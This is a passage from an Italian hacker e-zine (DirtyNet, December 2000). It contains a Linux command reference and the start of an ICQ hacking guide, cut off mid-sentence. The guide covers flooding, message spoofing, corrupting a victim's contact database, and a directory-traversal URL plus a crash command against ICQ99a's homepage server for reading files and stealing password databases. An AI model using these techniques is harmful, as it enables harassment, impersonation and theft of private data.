____ _ _____ _____ __ __ __ _ ____ _____ | _) \| || () )|_ _|\ \/ /| \| || ===||_ _| |____/|_||_|\_\ |_| |__| |_|\__||____| |_|Numero "1" -+-+-+//\\ Rivista numero "1" Dicembre 2000 //\\-+-+-+ ::Inizio Disclaimer:: Tutto il contenuto di questo testo da ritenersi dannoso quindi non applicabile. L'utente pregato di non mettere in atto quanto scritto .Esso solo stato pubblicato per offrire una conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo' modificare ne tanto meno vendere senza il consenso dell'autore.Se non si rispettano le norme l'utente avr commesso azione illegale. In questo testo solamente presente INFORMAZIONE, e l'informazione per legge LEGALE. Leggendo queste righe tu ACCETTI I TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella questo file. ::Fine Disclaimer:: Grazie per tutto il sostenimento, grazie per l'incitamento, grazie di tutto... Questo il numero uno di "DirtyNet" , si puo' trovare ai seguenti siti (per ora): http://www.hackersat.com http://www.spyrohack.com http://www.tankcommandos.org http://www.hackerzine.org Non voglio divagare magari riducendo l'interesse principale che da' questo testo che ,ricordo, sopratutto la conoscenza in varie categorie.Nessun autore di questo testo si definisce hacker, newbie, phreaker o altro ...noi siamo tutti stupidi( non stupidi in quel senso che sapete) in qualcosa , se non conosciamo una tecnica cerchiamo di leggere per apprenderla...Se non siamo all'inizio stupidi significa che siamo dei geni nati!!Anche kevin Mitnick era stupido in hacking, ma dopo l'impegno ha colmato il tutto (lasciamo perdere i risultati!) !! Con questo primo numero non vi introduciamo articoli tanto avanzati, tranne alcuni... Diciamo che sarebbe superfluo anche ai newbies ma noi iniziamo da zero sempre...per poi arrivare aa... a?Ma non si sa', quello che vogliamo diventare. Gli autori non specificati sono al momento ignoti, possiamo dire che li stiamo "cercando". ATTENZIONE: vietato postare questo testo tramite newsgroup. BUONA LETTURA. sYn^[ Salve a tutti :) Queste righe solo per dirvi cio' che penso riguardo al debutto di questa e-zine... che spero' avra successo, e nella quale spero di poter inserire qualche articoletto qua e la'(grazie SYN!), cercando di scrivere cose modeste ma originali... dicevo, voglio scrivere quello che mi viene da pensare al riguardo del debutto di Dirty Net... beh, semplicemente, mi viene da pensare: ho poco da insegnare e tanto da imparare, che cacchio scrivo a fare articoli che saranno per forza di basso livello tecnico? Io, che non capisco una cippa di Unix... che leggendo un sorgente in C vengo percorso da un brivido... perch lo faccio? Non che si tratta solo di presunzione, che sia solo lo sfizio di scrivere il proprio nick su un'e-zine di un hacking team esordiente? No. Perch lo faccio? Beh, perch bello. E' bello collaborare con un team per creare qualcosa insieme...e poi se vero che c' sempre qualcuno che ne sa piu' (ma MOLTO DI PIU' :)) di te altrettanto vero che c' allo stesso modo sempre qualcuno che ne sa di meno... io magari oggi non capisco il sorgente in C di cui sopra, ma due mesi fa non capivo neanche l'output di netstat... oggi c' qualcuno che non capisce l'output di nestat, e magari dopo aver letto qua a che serve netstat si porra' un altro problema... andra' avanti, continuando ad imparare... perche' non si finisce mai di imparare. Io conosco i miei limiti, non sono un hacker, ma almeno posso dire fieramente che non ho mai fatto uno scanning alla cazzo della 12345, cercando un pollo col server di NetBus... posso dire di non essere un lamer. Per ora mi basta questo... Alla prossima, speriamo presto... e intanto cerchiamo di dare una ripulita alla nostra "Dirty Net", la caccia al lamer sempre aperta :) byez, Ghent -==H@ Team==- *** ciau webmaster (approposito, quella table dell'anonimyzer ancora sballata... tutto bello il resto del situccio, compliments) ͹ \/\/\/\/\/\/\/\/\ \/\/\/\/\/\/\/\/\ /\/\/\/\/\/\/\/\ INDICE \/\/\/\/\/\/\/\/ \/\/\/\/\/\/\/\/\ \/\/\/\/\/\/\/\/\ ͹ |Titolo| |Autore| --=Hacking=-- [LINUX NO PROBLEM.....................................|sYn^.........] [GUIDA ALL'HACKING DI ICQ.............................|Ghent........] [WAR ON NAPSTER.......................................|To sYn^......] [HACKING IRC - THE DEFINITIVE GUIDE...................|Klider&sYn...] [HACKERS O.3d.........................................|Iannaccone...] [COME FAR SUICIDARE IL ROOT...........................|pIGpEN.(10x).] [WU-FTP 2.4(1) EXPLOIT................................|.............] [FLAT:USI E ABUSI.....................................|Spyro........] [ISTALLAZIONE DI UN FIREWALL..........................|sYn^.........] [INTRODUZIONE AI DENIAL OF SERVICE....................|kEwL.........] [KERNEL E COMPILAZIONE................................|sYn^.........] --=Hacking satellitare=-- [SEMPLICE PROGRAMMAZIONE DI UNA WAFER CARD ............|sYn^........] [ISTRUZIONI PER L'AGGIORNAMENTO DEL RICEVITORE HUMAX IRCI-5400......] --=Phreaking=-- [CELLULAR TELEPHONE ESN EMULATION......................|............] [SEGRETERIE TELEFONICHE................................|mR_bIs0n....] [RICARICARSI IL CELLULARE O ALMENO PROVARCI............|Screener_it.] --=Elettronica=-- [COME RISOLVERE I PROBLEMI DI RFI/EMI GENERATI DAI COMPUTER..LisosYn] --=Riflessione=-- [RIFLETTIAMO SUI NOSTRI DIRITTI........................|A[v]a[t]A[r]] [COMUNICATO HACKLAB-FI SUGLI HACKERSS DAYS.........................] --=Illegality=-- [LA TRUFFA POSTALE.....................................|mR_bIs0n....] [...................................................................] [...................................................................] ͹ \/\/\/\/\/\/\/\/\/ /\/\/\/\/\/\/\/\/\ \/\/\/\/\/\/\/\/\ Autori e membri \/\/\/\/\/\/\/\/\ \/\/\/\/\/\/\/\/\/ con rispettive e-mail /\/\/\/\/\/\/\/\/\ ͹ [sYn^------------------------synarckio1@yahoo.it - syn@hackersat.com] [A[v]a[t]A[r]-------------------------------avatar31@libero.it------] [Screenet_it--------------------------------screener_it@freemail.it-] [Spyro----------------pazzo2000@altavista.it - spyro2600@hotmail.com] [mR_bIsOn-----------------------------------stusciti@yahoo.it-------] [kEwL---------------------------------------kewl@penguinpowered.com-] [Ghent--------------------------------------ghent@hackersat.com-----] [-------------------------------------------------------------------] [-------------------------------------------------------------------] AScii by sYn^]|[ & kEwL ===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Hacking=--====ooO===0===Ooo===oOOo===ooO===0===Ooo=== -----------::LINUX NO PROBLEM::----------- -COMANDI- LAVORO SINTASSI PROCESSI DI LINUX (console) All'inizio questo file di test mi servito tempo fa per ripassare bene tutti i comandi di Linux. Ho creduto che anche a voi potrebbe essere di aiuto,ho aggiunto infatti anche altre parti per ampliare l'argomento, come il LESSICO e i CONSIGLI che si trovano in fondo pagina,Buona Lettura! Premetto che con questo file di testo sia diffile imparare tutto il sistema operativo ,io consiglio la lettura a chi ha almeno un minimo di conoscenza e potrebbe servirgli. sta per il nome del file che interessa ma in alcuni casi bisogna necessariamente indicare il percorso ad esempio: /var/log/httpd/access_log. logout :il processo che chiude i file aperti,termina i processi. man :avvia le pagine del manuale linux,se cercate la pagina del man del comando date scrivete man date xinit : avvia xwindows startx : avvia il KDE twm(da xwindows):avvia il gestore di finestre omonimo pwd : mostra in quale directory siete al momento ls : elenca i file e altro nella directory corrente ls -l : elenca i file con dettagli los -al : elenca anche i file nascosti da linux "." (punto) cd : cambia directory find -name :trova il file richiesto in base al nome. (in directory scrivendo / trovera file in all the sistem) find -ctime :trova il file richiesto in base alla data find -size :trova il file richiesto in base alla dimensione. locate : trova velocemente il file in base al nome whereis :trova il file e riporta il percorso grep :trova file che contengono una parola. touch : aggiorna il file oppure se il file non esiste lo crea nella directory corrente rm :cancella il file.Attnzione per un potente comando!! mkdir : crea una directory rm -r : rimuove directory con tutti i file compresi cp : copia il file nella directory specificata cp : copia directory mv :rinomina il file cat :legge il file o anch piu' di uno head :legge il file ma solo le prime 10 righe tail :legge il file ma solo le ultime righe vi :lo edita e lo modifica _______________________________________________________________________________________ Comandi vi modalita' command l muove a destra h muove a sinistra j muove alla linea successiva k muove alla linea precedente x cancella un carattere selezionato d cancella una linea cliccata a aggiunge il testo al termine della riga selezionata w+invio salva il file w salva il file con nome q+invio esce da vi i attiva la modalita' insert (prima del carattere sotto il cursore) a attiva la modalita' insert (dopo il carattere sotto il cursore) modalita' insert esc attiva la modalita' command backspace o canc torna indietro o cancella il testo inserito ______________________________________________________________________________________ wc :conta le righe ,i caratteri ,le parole del file specificato sort :ordina le righe del file specificato sort + -t" " -b :ordina il file in base ai valori contenuti nella seconda colonna.(-t il separatore e -b ignora gli spazi bianchi) split -l :divide il file in segmenti di tante linee quanto indicato.(si possono usare anche i K o MB occupati usando -b con k o m) diff :prende due file ;un modello originale e uno modificato,e come risultato produce un file che contiene le informazionni necessarie a ricostruire il file nuovo usando le informazioni del file aggiornato. patch : aggiorna il file compress : comprime il file con un vecchio formato UNIX uncompress :decomprime il file con un vecchio formato UNIX zcat | more : legge il contenuto senza doverlo decomprimere zip :comprime il file unzip :decomprime il file bzip2 :comprime il file (miglior rapporto di compressione) bunzip2 :decomprime il file (miglior rapporto di compressione) ls -l :mostra l'occupazione del disco dovuta ai file df : fornisce informazioni sull'occupazione del disco tar -cvf : archivia i file tar -xvf : decomprime il file.tar _____________________________________________________________________________________________ I PROCESSI &:esegue il programma in background ctrl + z: ionterrompe il comando bg :manda il comando inn background fg :ripristina il comando in foreground ps: elenca i processi in memoria kill -l :elenca tutti i segnali che potete mandare con il comando kill segnale SIGHUP:forza il processo a ricaricare le informazioni segnale SIGKILL: forza la terminazione del processo..senza scampo! kill :manda un segnale kill a un processo nohup & :evita che il processo venga terminato nice -n :cambia la priorita' del processo (20 il minimo ,-20 il massimo) renice : abbassa la priorita' del processo top :visualizza un elenco aggiornato di processi ( per uscire da top premere ctrl+c) spell :trova gli errori di battitura (per uscire da spell premere ctrl+d) spell < :applica spell sul file ,ridinezionando il file al suo STDIN (il carattere < dirige il contenuto del file alla sua destra ,nello STDIN del comando a sinistra) > : il contrario (il carattere > manda il contenuto del file alla sua sinistra ad esempio: tail -30 /var/log/httpd/access_log > : inserisce le ultime 30 linee in un file) ___________________________________________________________________________________ ___________________________________________________________________________________ Programmazione base shell Con la vostra shell voi potrete programmare, nel linguaggio shell, degli script che vi faciliteranno il lavoro. Ad esempio se ogni giorno dovete conmpiere una serie di azioni e quindi dovete impartire comandi molto spesso,potreste creare uno script che faccia tutto questo ,inserendogli i comandi da impartire. Adesso passo a farvi vedere uno script e poi passo a descriverlo: #!/bin/csh echo "saluti a tutti" | mail nostramail@linux.com grep "Bob" /usr/local/httpd/logs/access_log | tail -l100 | lpr xterm -e trn & exit Finito il lavoro uscite dall'editor ,il vi, e cambiate gli attributi per renderlo eseguibile : chmod 755 nostrofile. Per eseguirlo basta richiamare /nostrofile. Con echo abbiamo posto l'oggetto "saluti a tutti", attraverso il | (serve perprendere un oggetto e trasferirgli l'azione) abbiamo inviato l'e-mail con il comando mail, grep ci restituisce quello che stiamo cercando cioe' "Bob" tail prende le ultime 100 righe contenenti bob lpr li invia alla stampa a xterm viene detto di far partire un programma eseguendolo nella finestra del terminale e usando l'opzione -e. Vi consiglio di programmare con la shell sh. Se non avete capito qualcosa non esitate scrivetemi a synarckio1@yahoo.it, vi rispondero' al piu' presto. ___________________________________________________________________________________ yppasswd :cambia password (consigliato se siete in ambiete doi rete) passwd :cambia la password chsh :cambia la shell che dovrete decidere successivamente chsh -l :mostra tutti i tipi di shell che si possono scegliere finger :visualizza informazioni su un utente collegato al sistema finger @ :visualizza informazioni su un utente collegato a un sistema remoto chfn :permette di aggiungere delle informazioni personali (che veranno visualizzate con finger) date : riporta la data esatta uptime :mostra l'ora esatta,gli utenti collegati al sistema,il tempo fda cui il sistema attivo e il carico di lavoro sottoposto al sistema who :permette di vedere gli utenti collegati al computer alias :Cambia il nome del comando cosi che quando lo eseguirete dovete digitare quello scritto da voi. export = :esporta il file nella dorectory specificata ________________________________________________________________________________________ I FILE DOT presenti nella directory home: .login e .logout leggendoli potreste aggiungere qualche riga che posso servirvi,come ad esempio che ad ogni di questi due processi (login e logout) venga visualizzata la data e l'ora. .bashrc o .bash_profile Script della shell che sono eseguiti quando aprite bash. .plan Un file che contiene informazioni che il vostro sistema rimandera' a chiunque vi contatti remotamente.Inseite nel vostro plan le informazioni che volete siano viste dalle persone che vi cercano remotamente. .Xdefaults _______________________________________________________________________________________________ telnet:avvia il programma telnet telnet :si collega alla macchina specificata rlogin : se siete fortunati vi troverete nella shell della macchina remota, altrimenti vi verranno chiesti nome utente e parola d'ordine. slogin:un programma che permette una forte opera di crittografia dei dati che vengono inviati(anche il nome utente e password!).Richiede un minimo di configurazione prima di eseguirlo. ftp :ftp permette di recuperare file accedendo ad una macchina remota,se volete collegarvi anonimamente scrivete anonimous (la password "guest"). Una volta connessi ad un sito ftp potrete usare i comandi cd e ls per navigare. get :dopo che si collegati fa il download del file specificato put :manda un file dalla directory ad un sistema remoto _________________________________________________________________________________________ POSTA ELETTRONICA mail E' disponibile su tutti i sistemi linux ed un programma gestibile dalla console.Veloce e non necessita di configurazione. pine e elm Sono dei gestori di posta a tutto schermo.Forse pine piu' potente di elm ma sono fatti per un utente che desidera avere un client a tutto schermo. mh Mail Hander probabilmente e il meno intuitivo programma di posta elettronica ,per usarlo dovete conoscere prima bene la programmazione della shell,sicuramente un potente client. procmail Mail Processor pensato per gestire sofisticati automatismi nel'elaborazione dei messaggi. ___________________________________________________________________________________________ CONSIGLI: Per contare quanti accessi ci sono stati su un sito dall'ultima vlta che il file log stato azzerato , possibile usare il comando wc -l /var/log/httpd/access_log. Se non sapete cosa ci sia in un file .tar usate tar -tvf . Se volete essere dei buoni utenti non usate tar sui file ,ma sulle directory. Per eseguire piu' comandi usare la seguente sintassi: ( ) & . Solo l'utente root ha la possibilita' di aumentare la priorita' di un processo in esecuzione. Come utenti potete solo abbassare la priorita' dei vostri processi , quindi attenti a non abbassarla troppo perch poi non potrete piu' rialzarla a meno di un intervento di un utente root. Se non capite che collegato al sistema,ricordate di usare finger.Potrebbe darvi ulteriori informazioni su chi sta utilizzando la macchina. Se volete vedere le variabili d'ambiente che sono gia' impostate nella vostra shell potete usare il comando "export" senza argomenti. LESSICO: Shell:significa "guscio",infatti un programma che si pone da interfaccia tra l'utente e il sistema operativo.Le funzioni della shell sono tutte di "mediazione". Root:radice ,sta ad indicare il livello utente o il ramo delle directory. Multitasking:il mandare in esecuzione piu' di un solo comando alla volta. Background: dietro le quinte. Foreground: in primo piano. PID: ID del processo. Hangup:la terminazione del processo a causa dei segnali. STDIN:connessione d'ingesso per un programma. STDOUT:connessione d'uscita per un programma. bash: un tipo di shell. console:linea di comando. Syn^ se alcuni concetti non vi sono chiari scrivetemi a synarckio1@yahoo.it --------- GUIDA ALL'HACKING DI ICQ ----------- ######################################################################################## ## Versione 1 # agosto 2000 # al piu' presto aggiunte a riguardo della versione 2000a ## ######################################################################################## Cosa fare in un paesino sperduto e desolato, all'una di notte? Semplice, tradurre/adattare/integrare una delle piu' autorevoli guide all'hacking di ICQ. La storia sempre la stessa, la documentazione in inglese abbonda, ma qui da noi difficile da trovare... Ok, inizio: premetto che non ho testato tutte le tecniche descritte e che questa guida stata scritta prima dell'uscita di ICQ2000, quindi probabilmente dei bugs del programma sarano stati corretti. Ah, dimenticavo: io non sono un hacker (almeno per ora ;)), quindi mi scuso con gli eventuali lettori piu' esperti di me che notassero qualche ingenuit... in quel caso, aiutaci a migliorare e comunicaci l'errore, te ne saremo grati (moralmente, beninteso :)) La guida di facile comprensione, ma se non conosci termini basilari come "spoofing" o non sai cosa sia un indirizzo IP o una porta (NO, NON "QUELLE" PORTE! :) ti invito a leggere qualche documento sull'hacking o su internet in generale - troverai sicuramente qualcosa che faccia al caso tuo nel nostro sito (www.hackersat.xs3.com). La guida originale, da me in parte tradotta "pari pari" e in parte adattata/ampliata, di Raven, e puo' essere reperita su http://blacksun.box.sk (da visitare ;) Ringrazio l'autore per avermi fatto imparare qualcosa, e voi che state leggendo per aver scaricato questo file... graditi i commenti e le critiche, naturalmente. Spero che non inizierete a fregare la password di ICQ o floodare chiunque (in quel caso, ricordate che non siete certo hackers ne newbies, ma solo LAMERS - e se vi becco saro' felice di testare la sicurezza del vostro Pc ;-)). Usate queste informazioni per proteggere voi stessi ed i vostri amici, ve ne saranno grati: ricordate, se volete impressionare qualcuno il modo migliore per farlo proteggerlo, non attaccarlo. Contenuti <===============> Cos' ICQ? * Cosa fa ICQ? * Per cosa adatto? * Dove posso trovarlo? * Prima di leggere questo tutorial Perch ICQ cosi' insicuro? * Operazioni lato-client * Scarsa programmazione e beta testing insufficiente * Altri programmi per l'istant messaging I cracks * Cosa sono i cracks? * Come possono servirmi i cracks per ICQ? * Come funzionano, e perch delle cose sono possibili? * Dove posso trovarli? * Scoprire l'IP senza i cracks Flooding * Vari tipi di flood * Come funzionano realmente questi programmi? * Cosa fare quando subisci un flooding Spoofing * Cos' lo spoofing? * Come posso spoofare eventi di ICQ? * Come funzionano questi programmi? * Usare lo spoofing per ******to play pranks on people * Usare lo spoofing per distruggere il DB di qualcuno * Proteggersi dalla distruzione del DB Falle della ICQ homepage * Cos' la ICQ homepage? * Come posso far crashare il client ICQ di qualcuno usando le falle della ICQ homepage? * Come posso guadagnare accesso in lettura all'HD di qualcuno sfruttando le falle della ICQ Homepage? * Su quali versioni funzioner? Trucchi per la funzione di trasferimento file di ICQ * Come posso mandare a qualcuno un immagine, un file di testo o altro che sia in realt un programma eseguibile? * Perch cio' accade? Smascherare gli utenti invisibili * L'opzione "web-aware" * Vari trucchi creativi Scoprire passwords * Scoprire la pwd dal DB. * Exploitare la funzione per il recupero della password della ICQ homepage Note finali * Usarlo o non usarlo? * Far girare ICQ sotto Linux. * A proposito delle "catene di S.Antonio" di ICQ Appendice A: Trovare quella piccola porta da solo * Come farlo? * Perch meglio farlo da solo? Appendice B: I vantaggi dei cloni Unix di ICQ * Eliminare l'avvertimento "you were added" (sei stato aggiunto) * Prendere l'IP e la porta dal client senza bisogno di nessuna patch * Spoofer di messaggi inclusi Appendice C: conversione IP ==> UIN da te stesso * Perch dovrei volerlo fare? * Come posso farlo? Appendice D: Divertirsi con le contact list * Come posso facilmente cancellare la contact list di qualcuno senza usare uno spoofer? * Come posso evitare che qualcuno lo faccia a me? Appendice E: Trucchi incredibili col protocollo di ICQ * Che trucchetti posso fare una volta imparato il protocollo di ICQ? * Dove posso imparare il protocollo di ICQ? Cos' ICQ? ========== ICQ si legge "I Seek You" - Io ti cerco - (piccolo gioco di parole). E' un programma innovativo inventato dalla Mirabilis (una software house, poi venduta ad AOL per circa 400 milioni di dollari nel 1998). ICQ ti permette di vedere se i tuoi amici sono online e di comunicare con loro. Puoi mandare messaggi, URLs, creare CHAT fra due o + utenti, trasferire files, mandare cartoline d'auguri, messaggi vocali e molto altro. Questo tipo di programma viene generalmente chiamato "instant messanger" (non credo che ci sia bisogno di traduzione :) Probabilmente ICQ il migliore in assoluto della categoria, e vanta un numero stratosferico di utenti. Puoi scaricarlo da www.icq.com o piu' semplicemente trovarlo sui CD di demo di qualche rivista... freeware, ed disponibile per varie versioni di Windows e per Mac. Per sapere come farlo girare sotto Linux, dai un'occhiata al capitolo "note finali". Perch ICQ cosi' insicuro? ============================ Principalmente per questi motivi: A) Troppe operazioni sono fatte dal client (operzioni lato-client) B) La gente della Mirabilis programma male :) Lasciatemi spiegare. Prima di tutto, le operazioni lato-client rendono ICQ piu' vulnerabile agli attacchi per varie ragioni. Ad esempio lo spoofing dei messaggi. E' possibile spoofare i messaggi (inviare messaggi che sembreranno mandati da un altro utente. Ci ritorneremo) con ICQ, perch ICQ ricever messaggi da tutti gli IP. Alcuni scelgono di dire al client di mandare i loro messaggi direttamente ad un altro client, mentre altri preferiscono mandare i messaggi attraverso il server, quindi ICQ ricever messaggi da tutti, non solo dal server.. Se tutti i messaggi fossero stati mandati attraverso il server, ICQ non avrebbe accettato la ricezione da nessun altra fonte e spoofare i messaggi ed altri eventi ICQ sarebbe stato piu' difficile. Un altro esempio: il prossimo capitolo parla dei cracks per ICQ. Leggilo e poi torna a questa parte, se non hai idea di cosa siano. Non bisogna essere guru del cracking per capire che alcune modifiche non avrebbero potuto essere effettuate se tutte le operazioni fossero state fatte dai servers ICQ. Ad esempio lo "smascheratore" di IP. Il tuo client ICQ ha bisogno degli indirizzi IP degli altri per poter loro mandare eventi. Se cio' fosse stato possibile solo attraverso il server, il tuo client ICQ avrebbe docuto contattare il server e dirgli di mandare un determinato evento a questo o quell'UIN, senza ancora sapere l'IP di questo UIN. Il server, dall'altro lato, sa gli IP di tutti e lo manda al posto tuo: se fosse cosi' l'unico modo per avere l'IP di qualcuno sarebbe conquistare l'accesso al server (un po' di difficolta' in piu' rispetto allo "scarica il crack e applicalo":)) (ndt: credo sia tutto giusto, ma suppongo che se si usassero i server per qualunque evento di instant messaging o sarebbe tutto terribilmente lento - e a rischio di privacy, perch qualunque messaggio verso qualcuno potrebbe essere "letto" dal server... IMHO non una bella cosa- opppure sarebbe necessaria una rete di servers ICQ MOLTO ramificata ed efficiente... e i server costano :)) Un altra pecca di ICQ lo scarso beta-testing, che ha lasciato la release distribuita al pubblico bacata... cmq non credete che ICQ sia il messanger meno sicuro in giro: ad esempio l'MSN messanger (della Microsoft... strano, eh?) largamente exploitabile... date un'occhiata alla Byte Me Page in http://blacksun.box.sk o magari tornate su www.hackersat.xs3.com piu' in la'... chiss che non troviate una guida in italiano ;)) I cracks ======== Prima di tutto, un crack in genere un piccolo file eseguibile che cambia qualcosa in un determinato programma. Ad esempio: converte un programma shareware (cio un sw che puo' essere distribuito liberamente ma con delle funzioni bloccate, o che magari cessa di funzionare dopo un periodo di prova se non lo registri) in uno completo, come se fosse il programma acquistato regolarmente. I cracks per ICQ ti permettono di: A) Vedere l'indirizzo IP di qualcuno, anche se ha selezionato l'opzione "don't show my IP" nel menu' delle preferenze. B) Aggiungere qualcuno nella tua contact list senza bisogno della sua autorizzazione. C) Lanciare piu' di un client ICQ allo stesso tempo (per usare contemporaneamente piu' UINs) D) Aggiungere te stesso alla tua contact list (questo si rivela utile nel proteggersi dall'alterazione del DB, leggi il capitolo sullo spoofing per avere maggiori infomazioni) Probabilmente il migliore crack-pack per ICQ IsoaQ. Puoi trovarlo sul nostro sito (www.hackersat.xs3.com) - SYN^: poi te lo passo - E' facile da usare, cmq puoi leggere la documentazione allegata al pack. Flooding ======== Floodare significa, naturalmente, bombardare qualcun altro con valanghe di messaggi o altri eventi (leggi il book di Syn "impariamo a floodare" per avere informazioni generiche sul flooding). Ci sono vari modi per floodare il client ICQ di qualcuno A) Il primo modo , naturalmente, cliccare su qualcuno nella tua contact list, scrivere un messaggio, copiarlo, mandarlo e quindi ricliccare, incollare e mandare.... naturalmente, un modo frustrante ed inefficace. B) Altrimenti, si puo' usare un flooder gi pronto... Questi flooder soto stati programmati da gente che ha imparato il protocollo di ICQ da sola esaminando ICQ o installando un falso server sui loro computer e vedendo come il client comuicava col server, o magari da qualcuno che ha letto della documentaione in merito e ha deciso di programmare un flooder. Poi, dei flooders faranno molti piu' dannni: manderanno tanti messaggi quanti ne decidi di mandare ma invece di mandarli da un solo UIN li invieranno ognuno da un falso UIN sorgente. In questo modo la vittima vedr presto la sua contact list riempirsi di gente che non conosce e falsi UIN, e si meraviglier nel vedere che ognuno gli ha mandato lo stesso messaggio. Puoi trovare un buon flooder su www.warforge.com (o anche nella sez. FILEZ del sito, Syn?). Spero che non userai indiscriminatamente questo genere di tool... e ricorda che usando un programma di quaclun altro senza sapere come funziona non compi certo un'azione da hacker. Non ti biasimero' se manderai un 200 messaggi al classico fallito che si presenta con "hey gay" e continua con "i'm your worst nightmare"... ma pensa prima di agire, e ricorda che se vuoi evitare questo genere di contatti puoi semplicemente decidere di non consentire la visualizzazione del tuo status online/offline. Cmq, avrai bisogno della porta di ICQ per far funzionare un flooder, di solito. La porta di ICQ una porta che ICQ apre e alla quale ascolta. Sono sempre porte tra la 1024 e la 2000. Devi solo scannare (con un port scanner, ovvio) questo range di porte impostando un valore di timeout abbastanza alto, 1-2 secondi. Visto che questi flooders ad altre "utilit" hanno bisogno della porta di ICQ per funzionare, potresti aprire varie porte in quel range per confondere dei lamers che provano a floodarti. Puoi farlo programmando qualcosa del genere da te, giocherellando con /etc/inetd.conf o altri files se stai usando Unix, usando Netcat o altri programmini (sezione filez??) C) ICQ ha anche una funzione chiamata "Email Express". Supponiamo che il tuo UIN sia 5917057. Se qualcuno manda un messaggio a 5917057@icq.com lo riceverai come "Email Express" direttamente nel tuo client ICQ. Ora, cosa succede se usi un maibomber standard verso questo tipo di indirizzo? Giusto, questa persona verr floodata di EmailExpress. Per proteggerti da queste cose, puoi disabilitare Email Express dal menu' delle preferenze in ICQ. Ancora una volta, ti invito a non fare nulla del genere. E ricorda che se non mascheri il tuo IP ed il tuo indirizzo e-mail saranno entrambi visibili negli headers del messaggio. Se subisci un flooding, ci sono dei programmi che chiuso il client ICQ cancelleranno ogni messaggio non letto (attento a non perdere messaggi importanti in questo modo). Ancora un volta, dai un'occhiata alla sezione FILEZ (forse, vero Syn?) Spoofing ======== Ancora, spoofare messaggi ed altri eventi o programmari tools che lo facciano possibile imparando il protocollo di ICQ. Il miglior spoofer si chiama Lame Toy, ed ancora, puoi trovarlo nella sezione filez (Ce li mettiamo o no, Syn?). Ci si puo' divertire parecchio usando gli spoofer. Ad esempio: puoi mandare a qualcuno dei messaggi da loro stessi, dicendo di essere il loro computer, o magari puoi inviare una lettera di insulti a qualcuno spacciandosi per la sua ragazza (ma non farai nulla del genere, VERO?:)). Lame Toy puo' anche spoofare altri eventi, come URL sending o richieste di file transfer, richieste di chat ecc. Inotre, se mandi a qualcuno un messaggio da se' stesso e lui si aggiunge alla sua contact list, la volta seguente che aprir ICQ perder la sua intera contact list. Questa viene chiamata "DB corruction", una alterazione del database (DB) di ICQ che contiene la tua intera contact list, tutte le tue informazioni e i settaggi personali. E' contenuto in una subdirectory della ditrectory di ICQ, chiamata DB (nelle versioni piu' vecchie della 99a), NewDB (in ICQ99a) o DB99b (in ICQ99b). Se la vittima si gi aggiunta nella sua contact list e vuoi vedere risultati immediati, puoi sempre mandargli un DoS attack in modo che debba ricollegarsi alla rete e rilanciare ICQ. Comunque, questa azione crudele e i DoS sono illegali, quindi siete sempre invitati a non farlo (la fine sempre quella: lamer). Se vuoi proteggerti da questa bastardata, usa uno dei cracks per ICQ che ti permettono di aggiungerti alla tua stessa contact list (Ehi! cosi' puoi anche vedere se sei online, e magari parlare a te stesso! Dimenticate questa frase, per piacere :)). Inotre, raccomando di backuppare il DB spesso. Falle della ICQ homepage ======================== L'ICQ homepage una funzione implementata dalla versione 99a build #1700 di ICQ. Permette di aprire un piccolo webserver sul proprio computer e metterci un piccolo sito senza bisogno di aluna conoscenza. Ci sar anche un counter, e sarai avvertito quando qualcuno visita la tua homepage. Si possono anche fornire vari file dal proprio computer. Naturalmene questo sito visitabile solo quando sei online, a visto che alcune persone (ndt: beati loro :) hanno connessioni LAN o ADSL o altri tipi di connessioni che li tengono online 24 su 24, 7 giorni alla settimana, questa funzione puo' tornare abbastanza utile. Ma giungiamo alla parte interessante: quanto sicuro questo piccolo webserver? La ICQ Homepage inclusa in ICQ99a #1700 e #1701 vulnerabile a due attacchi enormemente stupidi. A) Quando ti ci connetti manualmente (con telnet, NetCat o un altro programma qualunque) ed inserisci un comando web-server non standard, lui semplicemente crasha e porta il client ICQ della vittima con se'. Ad esmpio: il comando get, combinato con un parametro, semplicemente preleva un determinato file. Se vuoi prelevare un file locato a http://www.hackersat.xs3.com/filez/pwddiziobill.txt (inutile che proviate, eh... non c' questo file sul server... per ora ;-)) semplicemente ti connetti a www.hackersat.xs3.com sulla porta 80 e scrivi "get /filez/pwddiziobill.txt" - senza virgolette, come al solito. Ora, se ti connetti al webserver della ICQ Homepage e semplicemente scrivi get senza alcun parametro, il webserver crasha insieme all'ICQ della vittima e ricevi un messaggio di "connessione perduta". Sulle nuove versioni di ICQ otterrai cmq un messaggio di "connection lost", ma questa volta perch il webserver ha semplicemente chiuso la connessione, non perch ha crashato o altro. B) La directory del webserver di ICQ , se non si cambiano i settaggi di default all'installazione, c:\program files\icq\homepage\. Qualsiasi cosa in questa directory puo' essere letta da qualunque web browser (o magari da telnet, se scegli di navigare con telnet per qualche strano motivo :)). Ma e se si potesse risalire l'albero delle directory? Cio, prima a c:\program files\icq\, poi a c:\ ed alle sue sottodirectory? Questo puo' essere fatto col webserver di ICQ che arriva con ICQ99a builds #1700 and #1701. Ad esempio: se vuoi leggere il system.ini di qualcuno, che si trova in C:\windows\system.ini, avrai bisogno di risalire tre volte per andare da c:\program files\icq\homepage a c:\, e quindi scendere da c:\ a c:\windows. Questo puo' essere fatto accedendo al seguente URL sul webserver della vittima: "/..../windows/system.ini" (ehm... senza virgolette :)). Ecco spiegato come funziona: Un punto significa "directory corrente". Due punti significano un directory in su. Tre stanno per due dir su e quattro, come nel nostro caso, significano 3 directory in su. Una volta che siamo risaliti di 4 directory e siamo su c:\, scendiamo a c:\windows e quindi arriviamo a c:\windows\win.ini. Questa regola universale, ovvero vale per qualunque OS (o almeno ogni OS che conosca), Windows incluso, che il sistema operativo dove gira il webserver di ICQ. Ora, un attimo... inseriamo questo URL, ma riceviamo un errore 304. Cio' accade perch questo webserver ci permette solo di accedere a pagine .html, file .jpg .gif o altri files che possono essere trovati normalmente in un sito. E' molto semplice fregare questo stupido webserver. Basta inserire questo URL: "/..../.html/windows/system.ini". E' banale, vero? Puoi anchee scaricare il DB della vittima per usarli in seguito per trovare la sua password (vedi il capitolo sul password stealing). Il colmo? Per scaricare i files puoi usare anche un download manager, come GetRight o Go!Zilla, dato che il web server di ICQ supporta il resume! NB: per fortuna - o purtroppo, a seconda dei punti di vista :)- le nuove versioni della ICQ Homepage non sono piu' vulnerabili a questo buco. NB2: /../../../ la stessa cosa di .... (risalire tre volte). Trucco per la funzione di trasferimento file di ICQ =================================================== Quando ricevi una richiesta di file transfer da 